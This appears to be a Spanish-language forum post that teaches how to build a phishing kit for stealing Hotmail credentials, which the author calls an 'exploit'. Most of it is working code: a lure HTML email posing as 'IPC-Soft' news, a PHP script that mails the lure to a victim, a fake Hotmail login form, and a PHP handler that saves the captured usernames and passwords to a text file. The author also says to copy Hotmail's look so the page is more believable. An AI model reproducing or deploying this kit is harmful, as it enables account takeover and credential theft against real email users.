bueno la verdad q los xploit parecen la manera mas rapida y simple de conseguir contraseñas... Creo q a todos nos gustaria poder crear uno, pero la mayoria no sabemos como....
aca tengo un tutorial, me gustaria q lo vean ustedes q saben mas y me digan si es correcto :
Archivos que hay que crear :
1-Exploit.html (Este es un codigo en HTML de lo que ustedes quieran ... en todos los enlaces que tenga este formulario , cuando la victima le de click debe ser redirigido a otra pagina)
2-Lanzador.php : este envia los datos a la victima.
3-login_fack.php : Este los guarda en un archivo de texto , y para los que tienen más experiencia en una base de datos MySql.
4-formulario.htm : Este es el que nos salta en cualquier lanzador de exploit que nos pide que pongamos nuestro mail y el de la victima para lanzar el exploit y en caso de caer sea enviado a nuestro mail.
5-login_fack.php : Este es a donde sera redireccionada la victima despúes de recibir el exploit
6-falsear.php : Este es el archivo que procesa todos los datos despues que la victima los ingreso en "login_fack.php"
=================Exploit====================
<p><strong>Novedades de IPC-Soft </strong></p>
<table width="0" border="1" align="center" cellpadding="0" cellspacing="3">
<tr>
<td width="356">Nuevo Skin en la comunidad <a href="
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer Sesion">(Leer más...) </a></td>
<td width="360">Lanzadores v1.0 <a href="
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer Sesion">(Leer más...)</a> </td>
</tr>
<tr>
<td>MSN Messenger Fackerv2.0 <a href="
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer Sesion">(Leer más...)</a> </td>
<td>Cualquier cosa <a href="
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer Sesion">(Leer más...) </a></td>
</tr>
<tr>
<td>[by Hack-CBA]</td>
<td><a href="
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer Sesion">
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer Sesion</a></td>
</tr>
</table>
==================================================
Notarán que en cada (Leer más ...) nos lleva a una pagina llamada ::
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion ::
obiamente esta es la pagina donde se produce un pedido a la victima que coloque su login y pass de hotmail.
======================Lanzador.php================ ====
<?
$html="
AQUI el code de arriba (Exploit en HTML)
";
mail($victima,"Novedades IPC-Soft",$html);
echo "El exploit fué enviado con exito";
?>
================================================== ==
Explico un poco , aqui lo que hacemos es crear una variable "$html" donde indicamos el contenido, seria el mensaje .
mail(Aquien lo enviamos, asunto , cuerpo del mensaje);
echo "Mensaje que todo esta bien";
?> cerramos php
Ahora hay que crear el formulario del lanzador, es decir, el que comunmente dice
Victima | @hotmail.com|
Tu mail | @hotmail.com |
aqui no vamos a poner ningun "Tu mail" porque en lugar de eso , crearemos un archivo de texto que nos mostrará los users y passwordws introducidos.
============formulario.htm========
<form name="form1" method="post" action="lanzador.php">
<table width="0" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>Victima</td>
<td><input name="victima" type="text" id="victima" value=" @hotmail.com"></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" name="Submit" value="Enviar"></td>
</tr>
</table>
</form>
<p></p>
====================================
aqui simplemente notaran que die "victima" type...
al enviar el formulario a "lanzador.php" , este interpreta a "victima" como $victima y es el correo a quien sera enviado el e-mail con un mensaje HTML
ok, ya esta casi todo listo. Solo nos queda hacer el "login_fack.php" donde se guardaran los passwords retenidos.
Hay que crear un formulario ... estilo la pagina principal de
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesionwww.hotmail.com
para que sea más creible.(Eso queda a su criterio , no el mio).
=============login_fack.php===================
<form name="form1" method="post" action="falsear.php">
<table width="0" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>Login</td>
<td><input name="login" type="text" id="login"></td>
</tr>
<tr>
<td>Password</td>
<td><input name="pass" type="password" id="pass" value=""></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" name="Submit" value="Enviar"></td>
</tr>
</table>
</form>
<p> </p>
=============================================
Aqui vemos varias cosas interesantes: falsear.php , login , pass
bueno falsear.php es la pagina que nos va a procesar todo y guardar el password
login y pass , serian
$login
$pass
ahora que sabemos esto vamos a terminar el "lanzador"
.
Creamos otra pagina php================falsear.php====================
<?php
$archivo='pass_fack.txt';
$login=$_POST[login];
$pass=$_POST[pass];
$hcba=fopen($archivo,'a');
fwrite($hcba,$login.$pass);
echo "datos correctamente introducidos";
?>
========================
bueno , más simple imposible...
$archivo , tienen que colocar el nombre y extención del archivo de texto que va a guardar los datos
¿Qué datos guarda?
$login & $pass
Los escribe con el metodo $_post .
// $hcba=fopen($archivo,'a');
Aqui indicamos que $hcba es = a abrir el archivo en modo "a" que seria ir agregando contenido sin borrar otro.
y luego indicamos que escriba en $hcba el $login y el $pass. espero que les sirva---- 
saludos
Autor